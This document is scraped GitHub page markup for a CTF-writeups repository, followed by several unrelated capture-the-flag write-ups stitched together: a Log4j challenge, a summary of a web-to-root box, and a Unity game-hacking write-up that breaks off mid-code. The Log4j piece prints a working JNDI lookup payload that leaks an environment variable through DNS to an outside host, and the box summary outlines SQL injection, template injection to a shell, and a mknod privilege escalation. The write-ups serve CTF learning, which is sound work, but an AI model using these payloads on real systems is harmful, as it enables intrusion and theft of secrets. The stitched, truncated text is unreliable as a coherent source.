7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg></button></div>
</div>
<div id="responsive-meta-container" data-turbo-replace></div>
<nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <span>Code</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path></svg> <span>Issues</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path></svg> <span>Pull requests</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path></svg> <span>Actions</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path></svg> <span>Projects</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>Security</span> <include-fragment src="/ArjunaAcchaDipa/CTF-writeups/security/overall-count" accept="text/fragment+html"></include-fragment>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path></svg> <span>Insights</span> <span></span>
<div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> <span>More</span> </div></summary> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Security Insights </details-menu></details></div></nav>
</div>
<turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " >
<div class="clearfix container-xl px-3 px-md-4 px-lg-5 mt-4"> <div >
<div class="file-navigation mb-3 d-flex flex-items-start"> <div class="position-relative"> <details class="js-branch-select-menu details-reset details-overlay mr-0 mb-0 " id="branch-select-menu" data-hydro-click-payload="{"event_type":"repository.click","payload":{"target":"REFS_SELECTOR_MENU","repository_id":369551288,"originating_url":"https://github.com/ArjunaAcchaDipa/CTF-writeups/tree/main/MetaCTF-2021/Simple-Format","user_id":null}}" data-hydro-click-hmac="521593bf1ad7bb8c550c79bb3338bfd9e94faf285c77580a74f9c2a999faf0a3"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path d="M9.5 3.25a2.25 2.25 0 1 1 3 2.122V6A2.5 2.5 0 0 1 10 8.5H6a1 1 0 0 0-1 1v1.128a2.251 2.251 0 1 1-1.5 0V5.372a2.25 2.25 0 1 1 1.5 0v1.836A2.493 2.493 0 0 1 6 7h4a1 1 0 0 0 1-1v-.628A2.25 2.25 0 0 1 9.5 3.25Zm-6 0a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Zm8.25-.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5ZM4.25 12a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Z"></path></svg> <span>main</span> <span></span> </summary>
<div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span>Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </header>
<input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div>
<div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div>
<div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" tabindex="" class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/ArjunaAcchaDipa/CTF-writeups/refs" cache-key="v0:1639330766.3264189" current-committish="bWFpbg==" default-branch="bWFpbg==" name-with-owner="QXJqdW5hQWNjaGFEaXBhL0NURi13cml0ZXVwcw==" prefetch-on-mouseover >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div></template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<footer class="SelectMenu-footer">View all branches</footer> </ref-selector>
</div>
<div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" tabindex="" hidden class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/ArjunaAcchaDipa/CTF-writeups/refs" cache-key="v0:1639330766.3264189" current-committish="bWFpbg==" default-branch="bWFpbg==" name-with-owner="QXJqdW5hQWNjaGFEaXBhL0NURi13cml0ZXVwcw==" >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <footer class="SelectMenu-footer">View all tags</footer> </ref-selector> </div> </tab-container> </input-demux> </div></div>
</details>
</div>
<div class="Overlay--hidden Overlay-backdrop--center" data-modal-dialog-overlay> <modal-dialog role="dialog" id="warn-tag-match-create-branch-dialog" aria-modal="true" aria-labelledby="warn-tag-match-create-branch-dialog-header" data-view-component="true" class="Overlay Overlay--width-large Overlay--height-auto Overlay--motion-scaleFade"> <header class="Overlay-header Overlay-header--large Overlay-header--divided"> <div class="Overlay-headerContentWrap"> <div class="Overlay-titleWrap"> <h1 id="warn-tag-match-create-branch-dialog-header" class="Overlay-title">Name already in use</h1> </div> <div class="Overlay-actionWrap"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" aria-label="Close" type="button" data-view-component="true" class="close-button Overlay-closeButton"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </div> </div> </header> <div class="Overlay-body "> <div data-view-component="true"> A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?</div>
</div> <footer class="Overlay-footer Overlay-footer--alignEnd"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn"> Cancel</button> <button data-submit-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn-danger btn"> Create</button> </footer></modal-dialog></div>
<div class="flex-1 mx-2 flex-self-center f4"> <div class="d-none d-sm-block"> <span><span><span>CTF-writeups</span></span></span><span>/</span><span><span>MetaCTF-2021</span></span><span>/</span>Simple-Format<span>/</span> </div> </div>
<div class="d-flex"> Go to file </div> </div>
<div class="f4 mt-3 mb-3 d-sm-none"><span><span><span>CTF-writeups</span></span></span><span>/</span><span><span>MetaCTF-2021</span></span><span>/</span>Simple-Format<span>/</span></div>
<div class="Box mb-3" > <div class="Box-header position-relative"> <h2 class="sr-only">Latest commit</h2> <div class="js-details-container Details d-flex rounded-top-2 flex-items-center flex-wrap" data-issue-and-pr-hovercards-enabled> <include-fragment src="/ArjunaAcchaDipa/CTF-writeups/tree-commit/ebc6e43eeb0f4444bb063aa228fd77c89d6d5de5/MetaCTF-2021/Simple-Format" class="d-flex flex-auto flex-items-center" aria-busy="true" aria-label="Loading latest commit"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-3"> </div></include-fragment> <div class="flex-shrink-0"> <h2 class="sr-only">Git stats</h2> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-history"> <path d="m.427 1.927 1.215 1.215a8.002 8.002 0 1 1-1.6 5.685.75.75 0 1 1 1.493-.154 6.5 6.5 0 1 0 1.18-4.458l1.358 1.358A.25.25 0 0 1 3.896 6H.25A.25.25 0 0 1 0 5.75V2.104a.25.25 0 0 1 .427-.177ZM7.75 4a.75.75 0 0 1 .75.75v2.992l2.028.812a.75.75 0 0 1-.557 1.392l-2.5-1A.751.751 0 0 1 7 8.25v-3.5A.75.75 0 0 1 7.75 4Z"></path></svg> <span> History </span> </div> </div> </div> <h2 id="files" class="sr-only">Files</h2>
<include-fragment src="/ArjunaAcchaDipa/CTF-writeups/file-list/main/MetaCTF-2021/Simple-Format"> Permalink
<div data-view-component="true" class="include-fragment-error flash flash-error flash-full py-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> Failed to load latest commit information.
</div> <div class="js-details-container Details" data-hpc> <div role="grid" aria-labelledby="files" class="Details-content--hidden-not-important js-navigation-container js-active-navigation-container d-block"> <div class="sr-only" role="row"> <div role="columnheader">Type</div> <div role="columnheader">Name</div> <div role="columnheader" class="d-none d-md-block">Latest commit message</div> <div role="columnheader">Commit time</div> </div> <div role="row" class="Box-row Box-row--focus-gray p-0 d-flex js-navigation-item" > <div role="rowheader" class="flex-auto min-width-0 col-md-2"> <span>. .</span> </div> <div role="gridcell" class="d-none d-md-block"></div> <div role="gridcell"></div> </div>
<div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>simpleFormat_solver.py</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> </div> </div>
</include-fragment>
</div>
</div>
</div>
</div>
</turbo-frame>
</main> </div>
</div>
<footer class="footer width-full container-xl p-responsive" role="contentinfo"> <h2 class='sr-only'>Footer</h2>
<div class="position-relative d-flex flex-items-center pb-2 f6 color-fg-muted border-top color-border-muted flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap mt-6 pt-6"> <div class="list-style-none d-flex flex-wrap col-0 col-lg-2 flex-justify-start flex-lg-justify-between mb-2 mb-lg-0"> <div class="mt-2 mt-lg-0 d-flex flex-items-center"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <span> © 2023 GitHub, Inc. </span> </div> </div>
<nav aria-label='footer' class="col-12 col-lg-8"> <h3 class='sr-only' id='sr-footer-heading'>Footer navigation</h3> Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About </nav> </div>
<div class="d-flex flex-justify-center pb-6"> <span></span> </div></footer>
<div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> You can’t perform that action at this time. </div>
<div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template>
<div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div>
<template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none m-2"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> </clipboard-copy> </div></template>
</div>
<div id="js-global-screen-reader-notice" class="sr-only" aria-live="polite" ></div> </body></html>
|
# Log 4 Sanity
I've overthought this task, but in the end what worked is just:
```${jndi:dns:kot.pl/${env:FLAG}}```
In the error message (shown in the terminal! Ugh) we see:
```2021-12-19 16:52:52,357 main WARN Error looking up JNDI resource [dns:kot.pl/hxp{Phew, I am glad I code everything in PHP anyhow :) - :( :( :(}]. javax.naming.InvalidNameException: Label exceeds 63 octets: pl/hxp{Phew, I am glad I code everything in PHP anyhow :) - :( :( :(}; remaining name '"kot.pl/hxp{Phew, I am glad I code everything in PHP anyhow :) - :( :( :(}"'``` |
# TLDR;- There is an SQL Injection in the /login endpoint- After retrieving the database content, cracking the admin hash and logging in as the admin, a new subdomain is revealed- The subdomain has a Server Side Template Injection, so you can get a shell- You now have the user flag- The home folder is mounted in the Docker, so you can write the authorized_keys file and connect as the user to the host through the Docker network- You can use a mknod privilege escalation to be able to read the raw /dev/sda and grep for the flag- You now have the root flag
Complete writeup: [https://radboudinstituteof.pwning.nl/posts/htbunictfquals2021/goodgames/](https://radboudinstituteof.pwning.nl/posts/htbunictfquals2021/goodgames/) |
# Lost Dungeon 1,2## Category: rev### Welcome Adventurer! Legend has it that there lies a dungeon filled with powerful beasts which can be tamed to reveal a secret message. The path to the dungeon is long and arduous. No one who has found the dungeon has returned back as once the beasts get to you they never leave. Can you reach the dungeon and tame the beasts?
_the decompilation of all game logic can be found under ./res/decompilation_
## Initial analysis and environment setup
Well, we have a **game hacking** challenge here, as is obvious from the challenge contents. Moreover, the game itself looks to be a _Unity_ game for windows. Ideal environment for me would be a local virtual machine with a GPU attached. Luckily, I already have one of those :P
But first, I decided to poke around the game files. I'm not familiar with Unity engine whatsoever, so I just checked everything and found some ascii strings.
```Game_Data/level0:I heard that the beasts in the dungeon will chase you forever if they get to you!Apparently if you lift the curse from the beasts they arrange themselves in a peculiar way to thank you!Only wizards can use the portalGame_Data/level1:Maybe if you could respawn here you could find what you are looking for?Ah you found the hidden level. But unfortunately you spawned in the wrong place. If only you could respawn in this mapGame_Data/level2:This is not the place you are looking for lolGame_Data/level3:This is not the place you are looking for```
_Interesting..._ With that, I went ahead and ran the game under windows environment.
## A look at the game itself
Looks nice! You can run around and interact with npcs. Each npc tells you something about the mechanics.
The portal doesn't let me in (I guess I'm not a wizard after all). Aside from that, there's a **really** long hallway to the east of the spawnpoint. The character moves way too slowly for such marathons, so I figured, that a speedhack would be handy. CheatEngine to the rescue!.
_well, that didn't work_.~~(then again, I'm not exactly a competent cheater, maybe I just did something wrong)~~
## Researching Unity engine
It was obvious, that I needed to do some research on unity games to be able to advance.That brought me to this wonderful forum post: https://www.unknowncheats.me/forum/unity/285864-beginners-guide-hacking-unity-games.html
I downloaded **dnSpy**, loaded _Assembly-CSharp.dll_ and got presented with some surprisingly readable and structured decompilation.
Even more surprising was the ease of editing and recompiling it. You can edit the C# representation of the code with a simple _right click->edit_, and compile the whole thing with _file->Save Module_.
## Speedhack
So, let's make a speedhack! ```C#using System;using UnityEngine;
// Token: 0x0200000E RID: 14public class Player : Mover{ // Token: 0x06000028 RID: 40 RVA: 0x00002AB1 File Offset: 0x00000CB1 protected override void Start() { base.Start(); Object.DontDestroyOnLoad(base.gameObject); }
